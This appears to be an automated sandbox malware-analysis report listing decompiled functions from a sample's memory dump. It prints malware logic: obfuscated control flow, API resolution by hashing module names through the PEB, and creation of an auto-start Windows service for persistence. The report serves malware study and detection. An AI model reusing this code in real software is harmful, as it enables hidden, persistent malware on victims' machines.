0x02cc65ba
0x02cc6560
0x02cc6560
0x02cc6560
0x02cc6565
0x00000000
0x00000000
0x00000000
0x02cc6565
0x02cc6560
0x02cc65a8
0x02cc65a1
0x02cc659a
0x02cc6598
0x02cc658d
0x02cc6587
0x02cc657c
0x02cc6576
0x00000000
0x02cc6878
0x02cc6878
0x02cc687d
0x02cc6c63
0x02cc6c68
0x02cc6cf8
0x02cc6cfd
0x02cc6d79
0x02cc6d7e
0x00000000
0x02cc6d84
0x02cc6d84
0x02cc6d8c
0x02cc6d91
0x02cc6d96
0x02cc6d9e
0x02cc6da6
0x02cc6dae
0x02cc6db6
0x02cc6dbe
0x02cc6dc6
0x02cc6dce
0x02cc6dd6
0x02cc6de6
0x02cc6deb
0x02cc6df3
0x02cc6df7
0x02cc6dfb
0x02cc6e57
0x02cc6dfd
0x02cc6dfd
0x02cc6e03
0x02cc6e05
0x02cc6e1d
0x02cc6e1f
0x02cc6e1f
0x02cc6e25
0x02cc6e2d
0x02cc6e32
0x02cc6e3a
0x02cc6e42
0x02cc6e51
0x02cc6e53
0x02cc6e59
0x02cc6e5f
0x02cc6e61
0x02cc6e68
0x02cc6e6d
0x02cc6e79
0x02cc6e7b
0x02cc6e7b
0x02cc6e81
0x02cc6e89
0x02cc6e91
0x02cc6e99
0x02cc6ea1
0x02cc6ea9
0x02cc6eb1
0x02cc6ec1
0x02cc6ec6
0x02cc6ece
0x02cc6ed2
0x02cc6edc
0x02cc6ee1
0x00000000
0x02cc6ee1
0x02cc6cff
0x02cc6cff
0x02cc6d6a
0x02cc6d6f
0x00000000
0x02cc6d01
0x02cc6d01
0x02cc6d06
0x02cc6d54
0x02cc6d59
0x00000000
0x02cc6d08
0x02cc6d08
0x02cc6d0d
0x00000000
0x02cc6d13
0x02cc6d13
0x02cc6d1b
0x02cc6d20
0x02cc6d22
0x00000000
0x02cc6d28
0x02cc6d2a
0x02cc6d2f
0x02cc6d33
0x02cc6d38
0x02cc6d3a
0x02cc6d40
0x02cc6d43
0x02cc6d48
0x02cc6d48
0x02cc6d3a
0x00000000
0x02cc6d22
0x02cc6d0d
0x02cc6d06
0x02cc6cff
0x02cc6c6e
0x02cc6c6e
0x02cc6f03
0x00000000
0x02cc6c74
0x02cc6c74
0x02cc6c79
0x02cc6cde
0x02cc6ce3
0x00000000
0x02cc6ce9
0x02cc6ce9
0x02cc6cee
0x00000000
0x02cc6cee
0x02cc6c7b
0x02cc6c7b
0x02cc6cc7
0x02cc6ccc
0x02cc6cce
0x00000000
0x02cc6cd4
0x02cc6cd4
0x00000000
0x02cc6cd4
0x02cc6c7d
0x02cc6c7d
0x02cc6c82
0x02cc6c99
0x02cc6cad
0x02cc6cb1
0x02cc6cb8
0x02cc6cbd
0x02cc6551
0x02cc6551
0x02cc6551
0x00000000
0x02cc6556
0x02cc6c84
0x02cc6c84
0x02cc6c89
0x00000000
0x02cc6c8f
0x02cc6c8f
0x00000000
0x02cc6c8f
0x02cc6c89
0x02cc6c82
0x02cc6c7b
0x02cc6c79
0x02cc6c6e
0x02cc6883
0x02cc6883
0x02cc6c43
0x02cc6c47
0x02cc6c4b
0x02cc6c52
0x02cc6c59
0x00000000
0x02cc6889
0x02cc6889
0x02cc688e
0x02cc69e9
0x02cc69ee
0x02cc6a2e
0x02cc6a33
0x00000000
0x02cc6a35
0x02cc6a35
0x02cc6a3d
0x02cc6a46
0x02cc6a4a
0x02cc6a57
0x02cc6a5f
0x02cc6a64
0x02cc6a6c
0x02cc6a79
0x02cc6a7e
0x02cc6a81
0x02cc6a83
0x02cc6b7a
0x02cc6b80
0x02cc6b87
0x02cc6b8a
0x02cc6b8f
0x02cc6b8f
0x02cc6b92
0x02cc6b9a
0x02cc6b9f
0x02cc6ba7
0x02cc6bac
0x02cc6bb4
0x02cc6bbc
0x02cc6bc1
0x02cc6bc5
0x02cc6bfc
0x02cc6bfc
0x02cc6bc7
0x02cc6bd6
0x02cc6bdb
0x02cc6bde
0x02cc6be2
0x02cc6be9
0x02cc6bf2
0x02cc6bf6
0x02cc6bf8
0x02cc6bf8
0x02cc6bfe
0x02cc6c04
0x02cc6c06
0x02cc6c0d
0x02cc6c12
0x02cc6c17
0x02cc6c1e
0x02cc6c20
0x02cc6c20
0x02cc6c26
0x02cc6c2e
0x02cc6c32
0x02cc6c34
0x02cc6c36
0x02cc6c3b
0x02cc6a89
0x02cc6a89
0x02cc6a91
0x02cc6a96
0x02cc6aa1
0x02cc6aa4
0x02cc6aa8
0x02cc6ab0
0x02cc6ab8
0x02cc6ac0
0x02cc6ac8
0x02cc6acd
0x02cc6ad9
0x02cc6add
0x02cc6b14
0x02cc6b14
0x02cc6adf
0x02cc6aee
0x02cc6af3
0x02cc6af6
0x02cc6afa
0x02cc6b01
0x02cc6b0a
0x02cc6b0e
0x02cc6b10
0x02cc6b10
0x02cc6b16
0x02cc6b1b
0x02cc6b1d
0x02cc6b24
0x02cc6b29
0x02cc6b2e
0x02cc6b30
0x02cc6b35
0x02cc6b35
0x02cc6b3a
0x02cc6b42
0x02cc6b4a
0x02cc6b52
0x02cc6b57
0x02cc6b5f
0x02cc6b63
0x02cc6b6b
0x02cc6b6d
0x02cc6b72
0x02cc6b72
0x02cc6551
0x02cc6551
0x02cc6551
0x00000000
0x02cc6551
0x02cc6551
0x02cc69f0
0x02cc69f0
0x02cc6f02
0x02cc69f6
0x02cc69f6
0x02cc69fb
0x02cc6a17
0x02cc6a1c
0x02cc6a1e
0x00000000
0x02cc6a24
0x02cc6a24
0x00000000
0x02cc6a24
0x02cc69fd
0x02cc69fd
0x02cc6a02
0x00000000
0x02cc6a04
0x02cc6a09
0x02cc6a0d
0x00000000
0x02cc6a0d
0x02cc6a02
0x02cc69fb
0x02cc69f0
0x02cc6894
0x02cc6894
0x02cc69d1
0x02cc69d8
0x02cc69df
0x00000000
0x02cc689a
0x02cc689a
0x02cc689f
0x02cc68e6
0x02cc68eb
0x00000000
0x02cc68f1
0x02cc68f3
0x02cc68f5
0x02cc69bc
0x02cc69bc
0x00000000
0x02cc68fb
0x02cc68fb
0x02cc6903
0x02cc6908
0x02cc6910
0x02cc6918
0x02cc691d
0x02cc6921
0x02cc6959
0x02cc6959
0x02cc6923
0x02cc6932
0x02cc6937
0x02cc693a
0x02cc693e
0x02cc6950
0x02cc6952
0x02cc6952
0x02cc695b
0x02cc6963
0x02cc6968
0x02cc6970
0x02cc697c
0x02cc697e
0x02cc6983
0x02cc6985
0x02cc6996
0x02cc699b
0x02cc69a0
0x02cc69a5
0x02cc69a8
0x02cc69aa
0x02cc69ac
0x00000000
0x02cc69b2
0x02cc69b2
0x00000000
0x02cc69b4
0x02cc69b4
0x02cc69b6
0x00000000
0x00000000
0x00000000
0x00000000
0x02cc69b6
0x02cc69b2
0x00000000
0x00000000
0x00000000
0x02cc6985
0x02cc68f5
0x02cc68a1
0x02cc68a1
0x02cc68d7
0x02cc68dc
0x00000000
0x02cc68a3
0x02cc68a3
0x02cc68a8
0x02cc68c9
0x02cc68cd
0x00000000
0x02cc68aa
0x02cc68aa
0x02cc68af
0x00000000
0x02cc68b5
0x02cc68b5
0x02cc68ba
0x00000000
0x02cc68ba
0x02cc68af
0x02cc68a8
0x02cc68a1
0x02cc689f
0x02cc6894
0x02cc688e
0x02cc6883
0x00000000
0x02cc687d
0x02cc69be
0x02cc69be
0x02cc69d0
0x00000000
0x02cc69d0

Strings

ke@5, xrefs: 02CC6D6F
l!`u, xrefs: 02CC6DF3
ke@5, xrefs: 02CC6D01
W$, xrefs: 02CC6AA8

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID:
String ID: W$$ke@5$ke@5$l!`u
API String ID: 0-26469448
Opcode ID: 2d01179a0521e694c715352b17346b9bc9cf1167e9345a52a07e4075002f59bb
Instruction ID: 4d0117adb94afdc90ddf8b67f6e15533932a556e0905344df4575b4067195eaf
Opcode Fuzzy Hash: 2d01179a0521e694c715352b17346b9bc9cf1167e9345a52a07e4075002f59bb
Instruction Fuzzy Hash: DE22C8B1A093018BC728DE79D74412E76EAABD0744F74492EE586D7354EB30CE49CB93

Uniqueness

Uniqueness Score: -1.00%

Function 02CC87D0, Relevance: 3.9, Strings: 3, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E02CC87D0() {
				char _v520;
				void* _v524;
				intOrPtr _v576;
				void* __ebx;
				void* __ebp;
				void* _t11;
				intOrPtr* _t12;
				intOrPtr* _t16;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t32;
				void* _t35;
				intOrPtr _t40;
				intOrPtr* _t53;
				intOrPtr _t58;
				void* _t59;
				intOrPtr _t60;
				short* _t62;
				short** _t63;
				void* _t64;
				void* _t66;
				void* _t67;

				_t64 =  &_v524;
				_t58 = 0;
				_t11 = 0x388705c7;
				_v524 = 0;
				_t63 = _v524;
				_t35 = _v524;
				_t60 = _v524;
				while(1) {
					_t66 = _t11 - 0x2793b377;
					if(_t66 > 0) {
						goto L21;
					}
					L2:
					if(_t66 == 0) {
						E02CC5070(_t35, _t63);
						_t11 = 0x93584cb;
						continue;
					} else {
						_t67 = _t11 - 0x124353fe;
						if(_t67 > 0) {
							if(_t11 == 0x2169f629) {
								_t21 =  *0x2ccddb8;
								if(_t21 == 0) {
									_t21 = E02CC3E80(_t35, E02CC3F20(0x667fdee), 0x505cb3fe, _t63);
									 *0x2ccddb8 = _t21;
								}
								 *_t21(_t35);
								L36:
								return _t58;
							} else {
								goto L18;
							}
						} else {
							if(_t67 == 0) {
								_t24 = E02CC34C0(0x2ccd8f0);
								_t53 =  *0x2ccdc60;
								_t59 = _t24;
								if(_t53 == 0) {
									_t53 = E02CC3E80(_t35, E02CC3F20(0xe66945e6), 0xcca28b0d, _t63);
									 *0x2ccdc60 = _t53;
								}
								_t40 =  *0x2cce2ec;
								 *_t53( &_v520, 0x104, _t59, _t40 + 0x5c, _t40 + 0x278);
								_t64 = _t64 + 0x14;
								E02CC3460(_t59);
								_t58 = _v524;
								_t11 = 0x3acbd78;
								continue;
							} else {
								if(_t11 == 0x3acbd78) {
									_t62 =  *0x2cce2ec + 0x278;
									while( *_t62 != 0x5c) {
										_t62 = _t62 + 2;
									}
									_t60 = _t62 + 2;
									_t11 = 0x2d3078b2;
									continue;
								} else {
									if(_t11 == 0x93584cb) {
										_t32 =  *0x2ccddb8;
										if(_t32 == 0) {
											_t32 = E02CC3E80(_t35, E02CC3F20(0x667fdee), 0x505cb3fe, _t63);
											 *0x2ccddb8 = _t32;
										}
										 *_t32(_t63);
										L10:
										_t11 = 0x2169f629;
										continue;
										do {
											while(1) {
												_t66 = _t11 - 0x2793b377;
												if(_t66 > 0) {
													goto L21;
												}
												goto L2;
											}
											goto L21;
										} while (_t11 != 0x33cd76b6);
										return _t58;
									}
								}
							}
						}
					}
					L37:
					L21:
					if(_t11 == 0x2d3078b2) {
						_t12 =  *0x2cce0f4;
						if(_t12 == 0) {
							_t12 = E02CC3E80(_t35, E02CC3F20(0x667fdee), 0x7f692adf, _t63);
							 *0x2cce0f4 = _t12;
						}
						_t35 =  *_t12(0, 0, 0xf003f);
						if(_t35 == 0) {
							goto L36;
						} else {
							_t11 = 0x34ee6736;
							continue;
						}
					} else {
						if(_t11 == 0x34ee6736) {
							_t16 =  *0x2ccdb50;
							if(_t16 == 0) {
								_t16 = E02CC3E80(_t35, E02CC3F20(0x667fdee), 0xc2730d45, _t63);
								 *0x2ccdb50 = _t16;
							}
							_t63 =  *_t16(_t35, _t60, _t60, 2, 0x10, 2, 0,  &_v520, 0, 0, 0, 0, 0);
							if(_t63 == 0) {
								goto L10;
							} else {
								_t58 = 1;
								_t11 = 0x2793b377;
								_v576 = 1;
							}
							continue;
						} else {
							if(_t11 != 0x388705c7) {
								goto L18;
							} else {
								_t11 = 0x124353fe;
								continue;
							}
						}
					}
					goto L37;
				}
			}

0x02cc87d0
0x02cc87da
0x02cc87dc
0x02cc87e1
0x02cc87e5
0x02cc87e9
0x02cc87ed
0x02cc87f1
0x02cc87f1
0x02cc87f6
0x00000000
0x00000000
0x02cc87fc
0x02cc87fc
0x02cc8908
0x02cc890d
0x00000000
0x02cc8802
0x02cc8802
0x02cc8807
0x02cc88e6
0x02cc89d2
0x02cc89d9
0x02cc89ec
0x02cc89f1
0x02cc89f1
0x02cc89f7
0x02cc89f9
0x02cc8a05
0x00000000
0x00000000
0x00000000
0x02cc880d
0x02cc880d
0x02cc887c
0x02cc8881
0x02cc8887
0x02cc888b
0x02cc88a3
0x02cc88a5
0x02cc88a5
0x02cc88ab
0x02cc88c7
0x02cc88c9
0x02cc88ce
0x02cc88d3
0x02cc88d7
0x00000000
0x02cc880f
0x02cc8814
0x02cc8855
0x02cc885f
0x02cc8861
0x02cc8864
0x02cc886a
0x02cc886d
0x00000000
0x02cc8816
0x02cc881b
0x02cc8821
0x02cc8828
0x02cc883b
0x02cc8840
0x02cc8840
0x02cc8846
0x02cc8848
0x02cc8848
0x02cc884d
0x02cc87f1
0x02cc87f1
0x02cc87f1
0x02cc87f6
0x00000000
0x00000000
0x00000000
0x02cc87f6
0x00000000
0x02cc87f1
0x02cc8903
0x02cc8903
0x02cc881b
0x02cc8814
0x02cc880d
0x02cc8807
0x00000000
0x02cc8917
0x02cc891c
0x02cc8993
0x02cc899a
0x02cc89ad
0x02cc89b2
0x02cc89b2
0x02cc89c2
0x02cc89c6
0x00000000
0x02cc89c8
0x02cc89c8
0x00000000
0x02cc89c8
0x02cc891e
0x02cc8923
0x02cc8936
0x02cc893d
0x02cc8950
0x02cc8955
0x02cc8955
0x02cc8976
0x02cc897a
0x00000000
0x02cc8980
0x02cc8980
0x02cc8985
0x02cc898a
0x02cc898a
0x00000000
0x02cc8925
0x02cc892a
0x00000000
0x02cc892c
0x02cc892c
0x00000000
0x02cc892c
0x02cc892a
0x02cc8923
0x00000000
0x02cc891c

Strings

6g4, xrefs: 02CC891E
6g4, xrefs: 02CC89C8
Ei, xrefs: 02CC888D

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID:
String ID: 6g4$6g4$Ei
API String ID: 0-2833161213
Opcode ID: e85e48d82996fa5f8ed557d63e7ab392cdb6c8477ce4a65ccf990c4d466da151
Instruction ID: 021653985a38763a1a55317dfcc0af58a8518a6e2b3d23af2cbcaa051ae049f8
Opcode Fuzzy Hash: e85e48d82996fa5f8ed557d63e7ab392cdb6c8477ce4a65ccf990c4d466da151
Instruction Fuzzy Hash: 67511575B0438197D626EA6A9894B7F3396ABC4304F340B3DF906DB244EB21CD41C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 02CC3F20, Relevance: 2.6, Strings: 2, Instructions: 96
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E02CC3F20(intOrPtr __ecx) {
				signed int _t93;
				signed int _t97;
				intOrPtr* _t100;
				signed short* _t103;
				signed int _t108;
				signed int _t113;
				intOrPtr* _t115;
				void* _t118;

				 *((intOrPtr*)(_t118 + 0xc)) = __ecx;
				_t100 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
				 *((intOrPtr*)(_t118 + 0x18)) = _t100;
				_t115 =  *_t100;
				if(_t115 == _t100) {
					L10:
					return 0;
				} else {
					do {
						_t103 =  *(_t115 + 0x30);
						 *(_t118 + 0x14) = 0x9c4e;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0x4464;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) >> 1;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff87db;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff18d7;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff529c;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff507b;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) | 0x3b9f69dc;
						 *(_t118 + 0x14) =  *(_t118 + 0x14) ^ 0xfffffdfe;
						 *(_t118 + 0x10) = 0x31f8;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) * 0x75;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x67893507;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x679fe359;
						 *(_t118 + 0x10) = 0x4955;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xa8908194;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) >> 8;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xffffdf1d;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xfffff42f;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) | 0x02e6e862;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xa6c2;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe36c9a70;
						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe1830958;
						if( *_t103 != 0) {
							do {
								_t97 =  *(_t118 + 0x14);
								 *(_t118 + 0x10) = 0x31f8;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) * 0x75;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x67893507;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x679fe359;
								 *(_t118 + 0x10) = 0x4955;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xa8908194;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) >> 8;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xffffdf1d;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xfffff42f;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) | 0x02e6e862;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xa6c2;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe36c9a70;
								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe1830958;
								_t113 =  *(_t118 + 0x14) << ( *(_t118 + 0x10) & 0x000000ff);
								_t93 =  *_t103 & 0x0000ffff;
								_t108 =  *(_t118 + 0x14) << ( *(_t118 + 0x10) & 0x000000ff);
								if(_t93 >= 0x41 && _t93 <= 0x5a) {
									_t93 = _t93 + 0x20;
								}
								 *(_t118 + 0x14) = _t93;
								_t103 =  &(_t103[1]);
								 *(_t118 + 0x14) =  *(_t118 + 0x14) + _t113;
								 *(_t118 + 0x14) =  *(_t118 + 0x14) + _t108;
								 *(_t118 + 0x14) =  *(_t118 + 0x14) - _t97;
							} while ( *_t103 != 0);
							_t100 =  *((intOrPtr*)(_t118 + 0x18));
						}
						if(( *(_t118 + 0x14) ^ 0x344765f2) ==  *((intOrPtr*)(_t118 + 0x1c))) {
							return  *((intOrPtr*)(_t115 + 0x18));
						} else {
							goto L9;
						}
						goto L12;
						L9:
						_t115 =  *_t115;
					} while (_t115 != _t100);
					goto L10;
				}
				L12:
			}

0x02cc3f29
0x02cc3f32
0x02cc3f37
0x02cc3f3b
0x02cc3f3f
0x02cc40cb
0x02cc40d4
0x02cc3f45
0x02cc3f45
0x02cc3f45
0x02cc3f48
0x02cc3f50
0x02cc3f58
0x02cc3f5c
0x02cc3f64
0x02cc3f6c
0x02cc3f74
0x02cc3f7c
0x02cc3f84
0x02cc3f8c
0x02cc3f99
0x02cc3f9d
0x02cc3fa5
0x02cc3fad
0x02cc3fb5
0x02cc3fbd
0x02cc3fc2
0x02cc3fca
0x02cc3fd2
0x02cc3fda
0x02cc3fe2
0x02cc3fea
0x02cc3ff6
0x02cc4000
0x02cc4000
0x02cc4004
0x02cc4011
0x02cc4015
0x02cc401d
0x02cc402e
0x02cc4036
0x02cc403e
0x02cc4043
0x02cc404b
0x02cc4053
0x02cc405b
0x02cc4063
0x02cc406b
0x02cc4073
0x02cc407e
0x02cc4081
0x02cc4086
0x02cc408d
0x02cc408d
0x02cc4090
0x02cc4094
0x02cc4097
0x02cc409b
0x02cc409f
0x02cc40a3
0x02cc40ad
0x02cc40ad
0x02cc40be
0x02cc40df
0x00000000
0x00000000
0x00000000
0x00000000
0x02cc40c0
0x02cc40c0
0x02cc40c3
0x00000000
0x02cc3f45
0x00000000

Strings

dD, xrefs: 02CC3F50
UI, xrefs: 02CC402E

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID:
String ID: UI$dD
API String ID: 0-2678678791
Opcode ID: 5b0b6e09fcfe7a652f9b1521d2d76371d588ae290acbf1882c862c8981155b4e
Instruction ID: 49f20a56b2bf5c36b1b727683962f390717802f0baa2eab93873f9dd7bc59796
Opcode Fuzzy Hash: 5b0b6e09fcfe7a652f9b1521d2d76371d588ae290acbf1882c862c8981155b4e
Instruction Fuzzy Hash: C541E2B65083828BD394CF28E54651BBBF0FBD0724F444E5DE4A1962A0D3B9DA4DCB93

Uniqueness

Uniqueness Score: -1.00%

Function 02CC3D10, Relevance: 2.6, Strings: 2, Instructions: 71
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E02CC3D10(signed short* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _t58;
				signed int _t60;
				signed short* _t65;
				signed int _t68;
				signed int _t72;

				_v4 = 0x9c4e;
				_t65 = __ecx;
				_v4 = _v4 + 0x4464;
				_v4 = _v4 >> 1;
				_v4 = _v4 + 0xffff87db;
				_v4 = _v4 + 0xffff18d7;
				_v4 = _v4 + 0xffff529c;
				_v4 = _v4 + 0xffff507b;
				_v4 = _v4 | 0x3b9f69dc;
				_v4 = _v4 ^ 0xfffffdfe;
				_v8 = 0x31f8;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x67893507;
				_v8 = _v8 ^ 0x679fe359;
				_v8 = 0x4955;
				_v8 = _v8 ^ 0xa8908194;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xffffdf1d;
				_v8 = _v8 + 0xfffff42f;
				_v8 = _v8 | 0x02e6e862;
				_v8 = _v8 + 0xa6c2;
				_v8 = _v8 ^ 0xe36c9a70;
				_v8 = _v8 ^ 0xe1830958;
				if( *((short*)(__ecx)) != 0) {
					do {
						_t60 = _v4;
						_v8 = 0x31f8;
						_v8 = _v8 * 0x75;
						_v8 = _v8 ^ 0x67893507;
						_v8 = _v8 ^ 0x679fe359;
						_v8 = 0x4955;
						_v8 = _v8 ^ 0xa8908194;
						_v8 = _v8 >> 8;
						_v8 = _v8 + 0xffffdf1d;
						_v8 = _v8 + 0xfffff42f;
						_v8 = _v8 | 0x02e6e862;
						_v8 = _v8 + 0xa6c2;
						_v8 = _v8 ^ 0xe36c9a70;
						_v8 = _v8 ^ 0xe1830958;
						_t72 = _v4 << (_v8 & 0x000000ff);
						_t58 =  *_t65 & 0x0000ffff;
						_t68 = _v4 << (_v8 & 0x000000ff);
						if(_t58 >= 0x41 && _t58 <= 0x5a) {
							_t58 = _t58 + 0x20;
						}
						_v4 = _t58;
						_t65 =  &(_t65[1]);
						_v4 = _v4 + _t72;
						_v4 = _v4 + _t68;
						_v4 = _v4 - _t60;
					} while ( *_t65 != 0);
				}
				return _v4;
			}

0x02cc3d13
0x02cc3d1b
0x02cc3d1d
0x02cc3d25
0x02cc3d29
0x02cc3d31
0x02cc3d39
0x02cc3d41
0x02cc3d49
0x02cc3d51
0x02cc3d59
0x02cc3d64
0x02cc3d67
0x02cc3d6e
0x02cc3d75
0x02cc3d7c
0x02cc3d83
0x02cc3d87
0x02cc3d8e
0x02cc3d95
0x02cc3d9c
0x02cc3da3
0x02cc3daa
0x02cc3db5
0x02cc3dc0
0x02cc3dc0
0x02cc3dc4
0x02cc3dd1
0x02cc3dd5
0x02cc3ddd
0x02cc3dee
0x02cc3df6
0x02cc3dfe
0x02cc3e03
0x02cc3e0b
0x02cc3e13
0x02cc3e1b
0x02cc3e23
0x02cc3e2b
0x02cc3e33
0x02cc3e3e
0x02cc3e41
0x02cc3e46
0x02cc3e4d
0x02cc3e4d
0x02cc3e50
0x02cc3e54
0x02cc3e57
0x02cc3e5b
0x02cc3e5f
0x02cc3e63
0x02cc3e6f
0x02cc3e77

Strings

dD, xrefs: 02CC3D1D
UI, xrefs: 02CC3DEE

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID:
String ID: UI$dD
API String ID: 0-2678678791
Opcode ID: 82085eb77aa1e6d6502ea5e6256e2cd79fe0ef0b357a1ba66029e8c86d29f621
Instruction ID: 68c6974b34dcec4b380718d78a56fef8bf27a00a012dfafa9061910dfb93bb12
Opcode Fuzzy Hash: 82085eb77aa1e6d6502ea5e6256e2cd79fe0ef0b357a1ba66029e8c86d29f621
Instruction Fuzzy Hash: 0531D2B2508342AFD3849E2AD54611FFBF0BB91724F46CD5DE0E9861A0D3B88989CF43

Uniqueness

Uniqueness Score: -1.00%

Function 02CC3BA0, Relevance: 2.6, Strings: 2, Instructions: 66
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E02CC3BA0(char* __ecx) {
				signed int _v4;
				signed int _v8;
				char* _t83;

				_v4 = 0x9c4e;
				_v4 = _v4 + 0x4464;
				_v4 = _v4 >> 1;
				_v4 = _v4 + 0xffff87db;
				_v4 = _v4 + 0xffff18d7;
				_v4 = _v4 + 0xffff529c;
				_v4 = _v4 + 0xffff507b;
				_v4 = _v4 | 0x3b9f69dc;
				_v4 = _v4 ^ 0xfffffdfe;
				_v8 = 0x31f8;
				_t83 = __ecx;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x67893507;
				_v8 = _v8 ^ 0x679fe359;
				_v8 = 0x4955;
				_v8 = _v8 ^ 0xa8908194;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xffffdf1d;
				_v8 = _v8 + 0xfffff42f;
				_v8 = _v8 | 0x02e6e862;
				_v8 = _v8 + 0xa6c2;
				_v8 = _v8 ^ 0xe36c9a70;
				_v8 = _v8 ^ 0xe1830958;
				if( *__ecx != 0) {
					do {
						_t83 = _t83 + 1;
						_v8 = 0x31f8;
						_v8 = _v8 * 0x75;
						_v8 = _v8 ^ 0x67893507;
						_v8 = _v8 ^ 0x679fe359;
						_v8 = 0x4955;
						_v8 = _v8 ^ 0xa8908194;
						_v8 = _v8 >> 8;
						_v8 = _v8 + 0xffffdf1d;
						_v8 = _v8 + 0xfffff42f;
						_v8 = _v8 | 0x02e6e862;
						_v8 = _v8 + 0xa6c2;
						_v8 = _v8 ^ 0xe36c9a70;
						_v8 = _v8 ^ 0xe1830958;
						_v4 =  *((char*)(_t83 - 1));
						_v4 = _v4 + (_v4 << (_v8 & 0x000000ff));
						_v4 = _v4 + (_v4 << (_v8 & 0x000000ff));
						_v4 = _v4 - _v4;
					} while ( *_t83 != 0);
				}
				return _v4;
			}

0x02cc3ba3
0x02cc3bab
0x02cc3bb3
0x02cc3bb7
0x02cc3bbf
0x02cc3bc7
0x02cc3bcf
0x02cc3bd7
0x02cc3bdf
0x02cc3be7
0x02cc3bf3
0x02cc3bf5
0x02cc3bf9
0x02cc3c01
0x02cc3c09
0x02cc3c11
0x02cc3c19
0x02cc3c1e
0x02cc3c26
0x02cc3c2e
0x02cc3c36
0x02cc3c3e
0x02cc3c46
0x02cc3c51
0x02cc3c60
0x02cc3c64
0x02cc3c67
0x02cc3c74
0x02cc3c78
0x02cc3c80
0x02cc3c91
0x02cc3c99
0x02cc3ca1
0x02cc3ca6
0x02cc3cae
0x02cc3cb6
0x02cc3cbe
0x02cc3cc6
0x02cc3cce
0x02cc3ce5
0x02cc3ce9
0x02cc3cef
0x02cc3cf3
0x02cc3cf7
0x02cc3d01
0x02cc3d0a

Strings

UI, xrefs: 02CC3C09
UI, xrefs: 02CC3C91

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

